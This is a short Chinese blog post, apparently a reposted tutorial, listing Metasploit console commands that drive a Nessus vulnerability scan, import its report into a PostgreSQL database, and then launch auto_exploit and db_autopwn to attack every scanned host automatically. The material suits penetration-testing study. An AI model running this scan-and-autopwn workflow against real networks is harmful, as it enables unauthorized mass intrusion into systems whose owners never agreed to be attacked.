标签:local stat host nis tar tcp policy 创建 提升
msf > load nessus
msf > nessus_connect fuckyou:123456@192.168.8.9 连接上nessus
msf > nessus_user_add <username> <password> 添加一个nessus用户
把test用户提升为admin
root@bt:# nessus-admin
Login : xxxooo
yest is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
test is now an administrator
msf > nessus_user_list 查看用户列表
msf > nessus_policy_list 选择一种扫描规则
ID Name Comments
— —- ——–
-1 Prepare for PCI-DSS audits (section 11.2.2)
-2 Web App Tests
-3 External Network Scan
-4 Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*] nessus_scan_new <policy id> <scan name> <targets>
[*] use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 testabc 192.168.1.100 新建扫描任务
msf > nessus_scan_status 查看扫描状态
msf > nessus_report_list 查看扫描报告列表
msf > nessus_report_list uid 查询指定扫描报告详细
msf > nessus_report_host_ports IP uid 列出指定IP的扫描结果
msf > nessus_report_host_detail IP 端口 tcp uid查看指定IP地址指定端口扫描详细结果
msf > nessus_report_get 导入一个扫描报告
msf > hosts -c address,os_name,os_flavor,os_sp,vulns 查看扫描结果
msf > vulns 查看扫描到的主机漏洞
用auto_exploit进行批量溢出
开启postgresql 创建一个数据库
root@bt:# service postgresql start
root@bt:~# psql -U postgres -h localhost
输入 “help” 来获取帮助信息.
postgres=# CREATE DATABASE testabc;
CREATE DATABASE
postgres=#
msf > db_status msf连接postgresql
msf > db_connect postgres:123456@localhost:5432/testabc
msf > nessus_report_list 查看nessus报告 并导入一个报告
msf > load auto_exploit 加载auto_exploit,执行vuln_exploit溢出
msf > load db_autopwn
msf > db_autopwn -t -p -e(自动工具所有的ip)
msf > db_autopwn -t -p -I ip -e(攻击指定的ip主机)
参考链接:
http://darkoperator.squarespace.com/blog/?currentPage=10
metasploit db_autopwn & load nessus
标签:local stat host nis tar tcp policy 创建 提升
原文地址:http://www.cnblogs.com/ssooking/p/6076864.html